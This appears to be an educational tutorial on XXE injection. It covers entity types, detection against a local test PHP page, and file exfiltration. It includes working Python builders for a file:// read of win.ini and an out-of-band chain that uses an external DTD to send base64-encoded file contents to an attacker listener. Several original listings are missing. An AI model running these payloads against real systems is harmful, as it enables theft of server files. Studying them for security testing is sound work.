In this article, we will have an in-depth look at how to find and exploit XML External Entity Injection vulnerabilities.

Introduction

XXE (XML External Entity), as the name suggests, is a type of attack against applications that parse XML data. Per the XML specification, an entity can be thought of as a unit of storage. In programming terms, an entity is like a variable that holds a value. The XML specification distinguishes two types of entities:

Internal Entity:

Per the XML standard, an internal entity is an entity whose value is defined as a string literal. For example, an entity that simply points to a string value is referred to as an internal entity. It can be defined as follows:

<!ENTITY internal "Internal Entity">

internal = Name of the variable

"Internal Entity" = String literal

External Entity:

If an entity is not an internal entity, it is an external entity. An external entity is declared with the SYSTEM keyword (or with PUBLIC, which additionally takes a public identifier before the URI) as follows:

<!ENTITY external SYSTEM "http://www.example.com/test.xml">

An external entity declaration includes a SystemLiteral, introduced by the SYSTEM keyword, which is called the entity’s system identifier. When an XML processor encounters an entity with a system identifier, it resolves the URI reference (http://www.example.com/test.xml) and uses the retrieved content as the value of the “external” entity wherever that entity is referenced in the XML data. We will discuss this in more detail in the OOB (Out of Band) XXE exploitation section.

Based on how it is declared and referenced, an entity further falls into one of two categories: general entities and parameterized entities (called parameter entities in the XML specification).

General Entity

General entities are the ones referenced in document content with an ampersand, as in &name;. They are declared as follows:

<?xml version="1.0"?>
<!DOCTYPE bar [
    <!ELEMENT bar ANY>
    <!ENTITY foo "this is foo">
]>
<bar>&foo;</bar>
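To see a general entity being expanded, a well-formed version of the document above can be handed to a parser. The following is a minimal sketch using Python's standard xml.etree.ElementTree module, which expands entities declared in the internal DTD subset. The variable names are illustrative only.

```python
import xml.etree.ElementTree as ET

# "foo" is a general entity declared in the internal DTD subset
# and referenced in the document content as &foo;.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE bar [
    <!ELEMENT bar ANY>
    <!ENTITY foo "this is foo">
]>
<bar>&foo;</bar>"""

root = ET.fromstring(DOCUMENT)

# The parser substitutes the entity's value before the application
# ever sees the element text.
print(root.tag, "->", root.text)
```

The application only receives the expanded text, which is why entity handling in the parser is invisible to most application code.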

Parameterized Entity

Parameterized entities can be used to assign values to other entities. They have a percent sign (%) before their name in the declaration and are referenced as %name;. They are generally found in DTDs. The percent sign tells the XML processor that this is a parameterized entity: wherever it is referenced, the processor inserts the replacement text and parses it as part of the DTD. We will see such entities again when constructing OOB XXE payloads. Parameterized entities can be defined as follows:

<?xml version="1.0"?>
<!DOCTYPE bar [
    <!ELEMENT bar ANY>
    <!ENTITY % foo '<!ENTITY another "this is foo">'>
    %foo;
]>
<bar>&another;</bar>

Finding XXE Vulnerability

Since XXE is relevant only to applications that parse XML data, the main attack vector when testing for it is any feature of the application that accepts input in XML format. How we find and confirm the vulnerability depends on how the application behaves, which gives us the following cases.

Case 1: When the parsed XML data is visible in HTTP response.

If an application parses XML data and displays the parsed result in the HTTP response, a basic test for XXE is to send a payload that uses an internal entity, simply to check whether the application processes entities at all.

Save the following PHP code as xxe.php in the web server root folder:

Send a POST request to the xxe.php file with the XML data shown in the following screenshot:

Observe that the application displays the username in the HTTP response, confirming that it is parsing the XML data.

Now, let’s add an internal entity to the XML data, reference it in the <username> element using &u;, and send the request again.

Observe that the application resolves our internal entity, which confirms that it processes entities and strongly indicates the XXE vulnerability.
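The probe described above can be sketched in Python as follows. The <username> element and the &u; entity come from the text. The root element name <creds>, the marker value, and the target URL in the usage note are assumptions made purely for illustration.

```python
import urllib.request
import xml.etree.ElementTree as ET

MARKER = "xxe-probe-1337"  # arbitrary value we expect to see echoed back


def build_probe(marker: str) -> str:
    """Return an XML body whose <username> is filled in via the entity &u;."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE creds [<!ENTITY u "{marker}">]>\n'
        "<creds><username>&u;</username></creds>"
    )


def send_probe(url: str, marker: str = MARKER) -> bool:
    """POST the probe to url and report whether the marker is reflected."""
    request = urllib.request.Request(
        url,
        data=build_probe(marker).encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
    with urllib.request.urlopen(request, timeout=10) as response:
        body = response.read().decode("utf-8", errors="replace")
    return marker in body


# Local sanity check: a parser that expands entities yields the marker.
parsed = ET.fromstring(build_probe(MARKER))
print(parsed.findtext("username"))
```

Against a test setup like the one in this article, the call might look like send_probe("http://localhost/xxe.php"), where the URL is a placeholder for wherever xxe.php is served. A return value of True means the marker came back in the response body.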

Case 2: When the parsed XML data is not visible in HTTP response.

To emulate an application that does not show the result of the parsed XML data in the HTTP response, we can simply comment out the echo statement in the PHP code used earlier. After commenting out the echo statement, our PHP code looks like the following.

In this case, we cannot confirm the XXE vulnerability with an internal entity alone, because we cannot tell whether the injected entities are being resolved by the application. Let’s quickly test this out.

We will simply send the internal entity payload shown in Case 1.

Observe that the application does not show anything in the HTTP response body.

For such cases, we can use an external entity that resolves to a URL controlled by us (the attacker or vulnerability tester). We can then confirm the vulnerability if we receive an HTTP request from the vulnerable server on our server.

We will be using a local Python server for demonstration purposes. However, you can use any remote server as well. Our request looks like the following:

Observe that the application resolves our external entity by sending an HTTP request to our server listening on localhost, port 81. This method of having the target resolve entities to a URL we control is known as OOB (Out Of Band) XXE.
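A callback listener and a matching payload can be sketched in Python as below. This is only one way to set it up, not the exact server used for the screenshots. The handler class, the helper names, and the root element <creds> are hypothetical.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

received_paths = []  # request paths seen so far, in arrival order


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Any hit here shows that the target resolved our external entity.
        received_paths.append(self.path)
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, format, *args):
        # Silence the default per-request logging on stderr.
        pass


def start_listener(port: int) -> HTTPServer:
    """Start the callback server in a background thread and return it."""
    server = HTTPServer(("127.0.0.1", port), CallbackHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def build_oob_probe(callback_url: str) -> str:
    """Return an XML body whose external entity points at callback_url."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE creds [<!ENTITY u SYSTEM "{callback_url}">]>\n'
        "<creds><username>&u;</username></creds>"
    )
```

A typical session would call start_listener(81), send build_oob_probe("http://localhost:81/xxe-test") to the target, and then inspect received_paths. Binding to port 81 may require elevated privileges on some systems, in which case any free high port works equally well.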

Data Exfiltration

In this section, we will look at how external entities can be used to exfiltrate sensitive data from the vulnerable system in each of the cases above, which shows the overall impact of the vulnerability.

Case 1: When parsed XML data is visible in HTTP response.

With external entities, we can also read system files with the permissions assigned to the vulnerable application or XML parser. If the parsed XML data is visible in the HTTP response, the contents of those files will be visible there too, which makes exploitation a lot easier. We will use the same PHP code as in Case 1 of the “Finding XXE Vulnerability” section.

Our request for reading a system file using an external entity looks like the following:

Note that in the above payload we are abusing the protocol type in the URL (using file:// instead of http://) to read system files.
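The only change from an HTTP callback payload is the system identifier. A minimal Python sketch of such a request body is shown below. The <username> element and the &u; entity follow the earlier examples, while the root element <creds> and the chosen file are assumptions for illustration.

```python
def build_file_read_payload(file_uri: str) -> str:
    """Return an XML body whose entity &u; resolves to a local file."""
    return (
        '<?xml version="1.0"?>\n'
        # The system identifier uses the file:// scheme instead of http://.
        f'<!DOCTYPE creds [<!ENTITY u SYSTEM "{file_uri}">]>\n'
        "<creds><username>&u;</username></creds>"
    )


payload = build_file_read_payload("file:///c:/windows/win.ini")
print(payload)
```

If the application echoes the <username> value, the file contents appear in its place in the response.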


Case 2: When parsed XML data is not visible in HTTP response (OOB XXE)

This is the most common case you will encounter during application security engagements. Here we will use parameterized entities to build our payload and learn some concepts along the way. The idea is to store the contents of the file in a variable and then reference that variable in an HTTP request, so that the file contents are sent to our server.

Let’s build our payload step by step to understand how and why it works. We first define a file variable to store the contents of win.ini and a req variable to send those contents to our server.

Let’s try this payload against our vulnerable PHP file from Case 2 of the “Finding XXE Vulnerability” section. Our request payload looks like the following:

We get the following error from the PHP interpreter, which states that our URL is invalid.

To overcome this error, we nest the external entity inside an internal entity and trigger the request again. Our request payload looks like the following:

This time we get a different error, which means that parameterized entity references are not allowed inside markup declarations in the internal document type declaration.

We can get around this restriction by using an external DTD. We create an xxe.dtd file on our server listening at localhost:81 with the following contents:

Our final request with the XML payload looks like the following. The payload resolves the reference to the external DTD (%dtd;) as well as the references defined in the DTD file xxe.dtd (%all; and %req;).
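The original listings are not reproduced here, so the following Python sketch rebuilds the two pieces along the lines of the commonly used OOB pattern. The entity names dtd, all, and req, the file win.ini, and the server at localhost:81 come from the text. The file entity name, the query parameter data, the root element <creds>, and the use of PHP's php://filter base64 wrapper are assumptions, as is the choice to reference %all; and %req; from the request rather than from the DTD file.

```python
CALLBACK = "http://localhost:81"  # attacker-controlled server from the text
TARGET_FILE = "file:///c:/windows/win.ini"


def build_external_dtd(callback: str = CALLBACK, target: str = TARGET_FILE) -> str:
    """Return contents that could be served as xxe.dtd."""
    return (
        # %file reads the target through PHP's base64 stream filter so the
        # contents can be embedded in a URL safely.
        "<!ENTITY % file SYSTEM "
        f'"php://filter/convert.base64-encode/resource={target}">\n'
        # %all expands to a declaration of %req; &#x25; is an escaped "%".
        '<!ENTITY % all "<!ENTITY &#x25; req SYSTEM '
        f"'{callback}/?data=%file;'"
        '>">\n'
    )


def build_request_payload(callback: str = CALLBACK) -> str:
    """Return the XML body sent to the vulnerable endpoint."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE creds [\n"
        f'  <!ENTITY % dtd SYSTEM "{callback}/xxe.dtd">\n'
        "  %dtd;\n"  # pull in the external DTD
        "  %all;\n"  # declare %req with the file contents in its URL
        "  %req;\n"  # trigger the HTTP request carrying the data
        "]>\n"
        "<creds><username>test</username></creds>"
    )


print(build_external_dtd())
print(build_request_payload())
```

Because the parameterized entity reference inside the %all value lives in an external DTD, it is not subject to the internal subset restriction described earlier.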

Observe that the application resolves all the references in our DTD file and in the request, and sends the base64-encoded contents of the win.ini file to our server, where they can be decoded to recover the original contents.
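Decoding the captured data takes only a few lines. The sketch below assumes the contents arrive in a query parameter named data on the request path logged by our server. That parameter name is a hypothetical choice and should match whatever the DTD actually uses.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def decode_exfiltrated(request_path: str, parameter: str = "data") -> str:
    """Extract and decode the base64 value carried in a logged request path."""
    query = urlsplit(request_path).query
    values = parse_qs(query).get(parameter, [])
    if not values:
        raise ValueError(f"no {parameter!r} parameter in {request_path!r}")
    # parse_qs turns "+" into a space; undo that before decoding, since
    # "+" is a legitimate base64 character.
    encoded = values[0].replace(" ", "+")
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


# Example with a locally generated value standing in for a real capture.
sample = base64.b64encode(b"[fonts]\r\n[extensions]\r\n").decode("ascii")
print(decode_exfiltrated("/?data=" + sample))
```

The sample value is generated locally and is not the output of a real target. In practice the request path would be copied from the listener's log.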

References

  • https://www.w3.org/TR/xml/#wfc-PEinInternalSubset
  • https://www.w3.org/TR/xml
  • https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf